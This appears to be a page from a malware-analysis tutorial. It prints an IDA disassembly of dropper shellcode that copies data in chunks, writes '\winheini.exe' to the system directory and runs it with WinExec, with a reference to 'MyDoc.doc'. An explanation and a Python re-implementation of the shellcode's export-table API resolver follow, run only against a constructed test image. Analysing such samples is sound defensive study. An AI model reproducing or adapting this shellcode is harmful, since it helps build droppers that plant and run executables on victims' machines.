seg000:00000101 push 0 seg000:00000103 push 80h ; 'Ç' seg000:00000108 push 4 seg000:0000010A push 0 seg000:0000010C push 1 seg000:0000010E push 80000000h seg000:00000113 push edi seg000:00000114 call dword ptr [ebx+401289h] ; Indirect Call Near Procedure seg000:0000011A mov [ebp-0A78h], eax seg000:00000120 push 0 seg000:00000122 push 0 seg000:00000124 push 6E00h seg000:00000129 push dword ptr [ebp-0A70h] seg000:0000012F call dword ptr [ebx+401275h] ; Indirect Call Near Procedure seg000:00000135 mov ecx, [ebx+401261h] seg000:0000013B mov [ebp-0A80h], ecx seg000:00000141 lea edi, [ebp-86Ch] ; Load Effective Address seg000:00000147 lea esi, [ebp-0A7Ch] ; Load Effective Address seg000:0000014D seg000:0000014D loc_14D: ; CODE XREF: seg000:00000183j seg000:0000014D push 0 seg000:0000014F push esi seg000:00000150 push 800h seg000:00000155 push edi seg000:00000156 push dword ptr [ebp-0A70h] seg000:0000015C call dword ptr [ebx+401291h] ; Indirect Call Near Procedure seg000:00000162 sub dword ptr [ebp-0A80h], 800h ; Integer Subtraction seg000:0000016C jle short loc_185 ; Jump if Less or Equal (ZF=1 | SF!=OF) seg000:0000016E push 0 seg000:00000170 push esi seg000:00000171 push 800h seg000:00000176 push edi seg000:00000177 push dword ptr [ebp-0A74h] seg000:0000017D call dword ptr [ebx+40128Dh] ; Indirect Call Near Procedure seg000:00000183 jmp short loc_14D ; Jump seg000:00000185 ; --------------------------------------------------------------------------- seg000:00000185 seg000:00000185 loc_185: ; CODE XREF: seg000:0000016Cj seg000:00000185 add dword ptr [ebp-0A80h], 800h ; Add seg000:0000018F push 0 seg000:00000191 push esi seg000:00000192 push dword ptr [ebp-0A80h] seg000:00000198 push edi seg000:00000199 push dword ptr [ebp-0A74h] seg000:0000019F call dword ptr [ebx+40128Dh] ; Indirect Call Near Procedure seg000:000001A5 push dword ptr [ebp-0A74h] seg000:000001AB call dword ptr [ebx+401271h] ; Indirect Call Near Procedure seg000:000001B1 lea edi, [ebp-96Ch] ; Load 
Effective Address seg000:000001B7 push 0 seg000:000001B9 push edi seg000:000001BA call dword ptr [ebx+40126Dh] ; Indirect Call Near Procedure seg000:000001C0 call dword ptr ds:40129Dh ; Indirect Call Near Procedure seg000:000001C6 push 0 seg000:000001C8 call dword ptr [ebx+401269h] ; Indirect Call Near Procedure

Page 36: Introduction to Malware Techniques and Logics Part 1 by Gunther

Introduction to Malware Techniques and Logics part 1

36

seg000:000001CE
seg000:000001CE ; =============== S U B R O U T I N E =======================================
seg000:000001CE
seg000:000001CE ; Attributes: bp-based frame
seg000:000001CE
seg000:000001CE sub_1CE         proc near               ; CODE XREF: seg000:0000003Dp
seg000:000001CE
seg000:000001CE var_8           = dword ptr -8
seg000:000001CE var_4           = dword ptr -4
seg000:000001CE arg_0           = dword ptr  8
seg000:000001CE arg_4           = dword ptr  0Ch
seg000:000001CE
seg000:000001CE                 push    ebp
seg000:000001CF                 mov     ebp, esp
seg000:000001D1                 add     esp, 0FFFFFFF8h         ; Add
seg000:000001D4                 pusha                           ; Push all General Registers
seg000:000001D5                 mov     [ebp+var_4], 0
seg000:000001DC                 call    $+5                     ; Call Procedure
seg000:000001E1                 pop     ebx
seg000:000001E2                 sub     ebx, 4011EAh            ; Integer Subtraction
seg000:000001E8                 mov     edi, [ebp+arg_4]
seg000:000001EB                 mov     ecx, 0FFFFFFFFh
seg000:000001F0                 xor     al, al                  ; Logical Exclusive OR
seg000:000001F2                 cld                             ; Clear Direction Flag
seg000:000001F3                 repne scasb                     ; Compare String
seg000:000001F5                 mov     ecx, edi
seg000:000001F7                 sub     ecx, [ebp+arg_4]        ; Integer Subtraction
seg000:000001FA                 mov     [ebp+var_8], ecx
seg000:000001FD                 mov     esi, [ebp+arg_0]
seg000:00000200                 add     esi, [esi+3Ch]          ; Add
seg000:00000203                 mov     esi, [esi+78h]
seg000:00000206                 add     esi, [ebp+arg_0]        ; Add
seg000:00000209                 mov     ebx, [esi+20h]
seg000:0000020C                 add     ebx, [ebp+arg_0]        ; Add
seg000:0000020F                 xor     edx, edx                ; Logical Exclusive OR
seg000:00000211
seg000:00000211 loc_211:                                        ; CODE XREF: sub_1CE+5Ej
seg000:00000211                 push    esi
seg000:00000212                 mov     edi, [ebx]
seg000:00000214                 add     edi, [ebp+arg_0]        ; Add
seg000:00000217                 mov     esi, [ebp+arg_4]
seg000:0000021A                 mov     ecx, [ebp+var_8]
seg000:0000021D                 repe cmpsb                      ; Compare Strings
seg000:0000021F                 jnz     short loc_224           ; Jump if Not Zero (ZF=0)
seg000:00000221                 pop     esi
seg000:00000222                 jmp     short loc_22E           ; Jump
seg000:00000224 ; ---------------------------------------------------------------------------
seg000:00000224
seg000:00000224 loc_224:                                        ; CODE XREF: sub_1CE+51j
seg000:00000224                 pop     esi
seg000:00000225                 add     ebx, 4                  ; Add
seg000:00000228                 inc     edx                     ; Increment by 1
seg000:00000229                 cmp     edx, [esi+18h]          ; Compare Two Operands
seg000:0000022C                 jb      short loc_211           ; Jump if Below (CF=1)


seg000:0000022E
seg000:0000022E loc_22E:                                        ; CODE XREF: sub_1CE+54j
seg000:0000022E                 sub     ebx, [esi+20h]          ; Integer Subtraction
seg000:00000231                 sub     ebx, [ebp+arg_0]        ; Integer Subtraction
seg000:00000234                 shr     ebx, 1                  ; Shift Logical Right
seg000:00000236                 add     ebx, [esi+24h]          ; Add
seg000:00000239                 add     ebx, [ebp+arg_0]        ; Add
seg000:0000023C                 movzx   eax, word ptr [ebx]     ; Move with Zero-Extend
seg000:0000023F                 shl     eax, 2                  ; Shift Logical Left
seg000:00000242                 add     eax, [esi+1Ch]          ; Add
seg000:00000245                 add     eax, [ebp+arg_0]        ; Add
seg000:00000248                 mov     eax, [eax]
seg000:0000024A                 add     eax, [ebp+arg_0]        ; Add
seg000:0000024D                 mov     [ebp+var_4], eax
seg000:00000250                 popa                            ; Pop all General Registers
seg000:00000251                 mov     eax, [ebp+var_4]
seg000:00000254                 leave                           ; High Level Procedure Exit
seg000:00000255                 retn    8                       ; Return Near from Procedure
seg000:00000255 sub_1CE         endp
seg000:00000255
seg000:00000255 ; ---------------------------------------------------------------------------
seg000:00000258                 db 0CFh ; -
seg000:00000259                 db  42h ; B
seg000:0000025A                 db    1
seg000:0000025B                 db    0
seg000:0000025C                 db    0
seg000:0000025D                 db    0
seg000:0000025E                 db    0
seg000:0000025F                 db    0
seg000:00000260                 db    0
seg000:00000261                 db    0
seg000:00000262                 db    0
seg000:00000263                 db    0
seg000:00000264                 db    0
seg000:00000265                 db    0
seg000:00000266                 db    0
seg000:00000267                 db    0
seg000:00000268                 db    0
seg000:00000269                 db    0
seg000:0000026A                 db    0
seg000:0000026B                 db    0
seg000:0000026C                 db    0
seg000:0000026D                 db    0
seg000:0000026E                 db    0
seg000:0000026F                 db    0
seg000:00000270                 db    0
seg000:00000271                 db    0
seg000:00000272                 db    0
seg000:00000273                 db    0
seg000:00000274                 db    0
seg000:00000275                 db    0
seg000:00000276                 db    0
seg000:00000277                 db    0
seg000:00000278                 db    0


seg000:00000279                 db    0
seg000:0000027A                 db    0
seg000:0000027B                 db    0
seg000:0000027C                 db    0
seg000:0000027D                 db    0
seg000:0000027E                 db    0
seg000:0000027F                 db    0
seg000:00000280                 db    0
seg000:00000281                 db    0
seg000:00000282                 db    0
seg000:00000283                 db    0
seg000:00000284                 db    0
seg000:00000285                 db    0
seg000:00000286                 db    0
seg000:00000287                 db    0
seg000:00000288                 db    0
seg000:00000289                 db    0
seg000:0000028A                 db    0
seg000:0000028B                 db    0
seg000:0000028C                 db    0
seg000:0000028D                 db    0
seg000:0000028E                 db    0
seg000:0000028F                 db    0
seg000:00000290                 db    0
seg000:00000291                 db    0
seg000:00000292                 db    0
seg000:00000293                 db    0
seg000:00000294                 db  50h ; P
seg000:00000295                 db  39h ; 9
seg000:00000296                 db  29h ; )
seg000:00000297                 db  30h ; 0
seg000:00000298 aExitprocess    db 'ExitProcess',0
seg000:000002A4 aWinexec        db 'WinExec',0
seg000:000002AC aClosehandle    db 'CloseHandle',0
seg000:000002B8 aSetfilepointer db 'SetFilePointer',0
seg000:000002C7 aLstrcata       db 'lstrcatA',0
seg000:000002D0 aGetsystemdirec db 'GetSystemDirectoryA',0
seg000:000002E4 aGetprocaddress db 'GetProcAddress',0
seg000:000002F3 aCreateprocessa db 'CreateProcessA',0
seg000:00000302 aCreatefilea    db 'CreateFileA',0
seg000:0000030E aWritefile      db 'WriteFile',0
seg000:00000318 aReadfile       db 'ReadFile',0
seg000:00000321 aGetlasterror   db 'GetLastError',0
seg000:0000032E aRtlzeromemory  db 'RtlZeroMemory',0
seg000:0000033C                 db    0
seg000:0000033D aWinheini_exe   db '\winheini.exe',0
seg000:0000034B aE              db 'e',0
seg000:0000034D aMydoc_doc      db '\MyDoc.doc',0
seg000:0000034D seg000          ends
seg000:0000034D
seg000:0000034D
seg000:0000034D                 end
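sub_1CE is the shellcode's own GetProcAddress: arg_0 is a module base and arg_4 a function name; the routine measures the name with repne scasb, follows e_lfanew (+3Ch) to the export directory RVA (+78h), walks AddressOfNames (+20h) for NumberOfNames (+18h) entries comparing strlen+1 bytes with repe cmpsb, then maps the matching index through AddressOfNameOrdinals (+24h) into AddressOfFunctions (+1Ch). The Python below is an added example, not the paper's or the shellcode's code: it performs the same walk with the same field offsets over a constructed in-memory image (not a real DLL), which lets the analyst confirm the offsets and also shows the one behaviour the listing lacks, a "not found" path (the loop simply falls through to loc_22E with a stale ebx).

```python
import struct

# Field offsets exactly as sub_1CE reads them (constructed example, not the paper's code)
E_LFANEW          = 0x3C   # DOS header -> PE header
EXPORT_DIR_RVA    = 0x78   # PE header + 0x78 = DataDirectory[EXPORT].VirtualAddress
NUMBER_OF_NAMES   = 0x18   # IMAGE_EXPORT_DIRECTORY fields used by the loop
ADDR_OF_FUNCTIONS = 0x1C
ADDR_OF_NAMES     = 0x20
ADDR_OF_ORDINALS  = 0x24


def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def resolve_export(img, name):
    """Same walk as sub_1CE: compare strlen+1 bytes (NUL included, as repe cmpsb
    does with var_8) against each AddressOfNames entry, then index -> ordinal ->
    AddressOfFunctions. Returns the RVA (the shellcode adds arg_0 for a VA) or
    None; the shellcode itself has no such check and falls through to loc_22E."""
    target = name.encode() + b"\0"
    pe = u32(img, E_LFANEW)
    exp = u32(img, pe + EXPORT_DIR_RVA)
    names = u32(img, exp + ADDR_OF_NAMES)
    ordinals = u32(img, exp + ADDR_OF_ORDINALS)
    functions = u32(img, exp + ADDR_OF_FUNCTIONS)
    for i in range(u32(img, exp + NUMBER_OF_NAMES)):
        rva = u32(img, names + 4 * i)
        if img[rva:rva + len(target)] == target:
            ordinal = struct.unpack_from("<H", img, ordinals + 2 * i)[0]
            return u32(img, functions + 4 * ordinal)
    return None


def build_test_image():
    """Constructed minimal image: only the fields sub_1CE touches are filled in."""
    img = bytearray(0x400)
    struct.pack_into("<I", img, E_LFANEW, 0x80)                 # PE header at 0x80
    struct.pack_into("<I", img, 0x80 + EXPORT_DIR_RVA, 0x100)   # export directory at 0x100
    # (name, ordinal, function RVA): the name table is sorted, the ordinals are not
    exports = [("CloseHandle", 2, 0x1000), ("ExitProcess", 0, 0x2000), ("WinExec", 1, 0x3000)]
    struct.pack_into("<IIII", img, 0x100 + NUMBER_OF_NAMES, len(exports), 0x240, 0x200, 0x220)
    str_rva = 0x300
    for i, (nm, ordinal, rva) in enumerate(exports):
        struct.pack_into("<I", img, 0x200 + 4 * i, str_rva)        # AddressOfNames[i]
        img[str_rva:str_rva + len(nm) + 1] = nm.encode() + b"\0"
        str_rva += len(nm) + 1
        struct.pack_into("<H", img, 0x220 + 2 * i, ordinal)        # AddressOfNameOrdinals[i]
        struct.pack_into("<I", img, 0x240 + 4 * ordinal, rva)      # AddressOfFunctions[ordinal]
    return bytes(img)
```

Because the compare covers the terminating NUL, a prefix such as "WinExe" does not match "WinExec", which is why the shellcode can safely carry short names like the 'e' string at 0x34B without colliding with an export.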